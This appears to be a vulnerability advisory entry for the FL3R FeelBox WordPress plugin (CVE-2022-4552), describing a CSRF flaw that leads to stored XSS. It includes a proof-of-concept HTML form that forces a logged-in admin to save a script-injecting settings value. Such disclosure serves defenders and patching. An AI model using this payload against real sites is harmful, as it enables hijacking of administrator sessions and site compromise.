Lucene search
WpvulndbWPEX-ID:307B0FE4-39DE-4FBB-8BB0-F7F15EC6EF52HistoryJan 04, 2023 - 12:00 a.m.
FL3R FeelBox <= 8.1 - Settings Update via CSRF to Stored XSS
2023-01-0400:00:00
wpvulndb
141
fl3r feelbox
csrf
stored xss
admin
form
html
example.com
EPSS
0.001
Percentile
34.7%
The plugin does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack
Make a logged in admin open a page containing the HTML code below
<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
<input type="text" name="feelbox_submit_hidden" value="Y">
<input type="text" name="fl3rfeelboxtitle" value='Do you like this post?"><img src onerror=alert(/XSS/)>'>
<input type="submit" name="submit" value="submit">
</form>Related
wpvulndb
wpvulndb
FL3R FeelBox <= 8.1 - Settings Update via CSRF to Stored XSS
2023-01-04 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-01-30 21:15:00
cvelist
cvelist
CVE-2022-4552 FL3R FeelBox <= 8.1 - Settings Update via CSRF to Stored XSS
2023-01-30 20:31:51
nvd
nvd
CVE-2022-4552
2023-01-30 21:15:11
cve
cve
CVE-2022-4552
2023-01-30 21:15:11